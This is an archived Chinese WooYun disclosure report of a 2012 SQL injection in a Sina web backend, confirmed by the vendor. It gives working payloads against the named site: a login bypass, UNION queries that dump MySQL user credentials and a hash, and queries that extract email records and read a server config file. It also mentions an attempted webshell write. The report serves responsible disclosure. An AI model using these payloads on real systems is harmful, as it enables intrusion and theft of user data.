漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-04528
漏洞标题:新浪后台引发的血案
相关厂商:新浪
漏洞作者: 灰太狼
提交时间:2012-02-15 03:58
修复时间:2012-03-31 03:59
公开时间:2012-03-31 03:59
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-02-15: 细节已通知厂商并且等待厂商处理中
2012-02-15: 厂商已经确认,细节仅向厂商公开
2012-02-25: 细节向核心白帽子及相关领域专家公开
2012-03-06: 细节向普通白帽子公开
2012-03-16: 细节向实习白帽子公开
2012-03-31: 细节向公众公开
简要描述:
后台直接用admin'or 1=1# 登陆 找到注入点 MYSQL外连
详细说明:
目标站http://bes.sina.net
进入后台 竟然还要账号密码。。开什么玩笑
直接用户名admin' or 1=1#
密码随意写 123456 成功登陆
ok
点来点去 找到个注入点http://bes.sina.net/content_detail.php?content_id=199
之后
http://bes.sina.net/content_detail.php?content_id=199 and 1=2 union all selEct group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),2,3,4,5,6 from+mysql.user--
yaoya:*B30D63E3C0BEE74D8A017AD371EB8810F01093CC:Y:%
可以MYSQL外连
破解了MD5
madwolf
成功连上
数据库还不少啊
http://bes.sina.net/content_detail.php?content_id=199%20aNd%201=2%20unIon%20all%20selEct%20concat%280x3a,email,0x3a,city,0x3a,login_time,province,ad_login_num,reg_time%29,2,3,4,5,6%20from%20rmail.ad_admin65%20limit%20268994,1%23
20W条邮箱啊。。可惜没密码
其他数据库不解释了
写入一句话不成功啊。。貌似目录没权限
读读配置吧
select load_file('/data0/apache/conf/extra/httpd-vhosts.conf')
完结。。
求证书+礼物啊。。
漏洞证明:
http://bes.sina.net/content_detail.php?content_id=199 and 1=2 union all selEct group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),2,3,4,5,6 from+mysql.user--
修复方案:
怎么修复你们懂得
版权声明:转载请注明来源 灰太狼@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2012-02-15 16:39
厂商回复:
非常感谢
最新状态:
暂无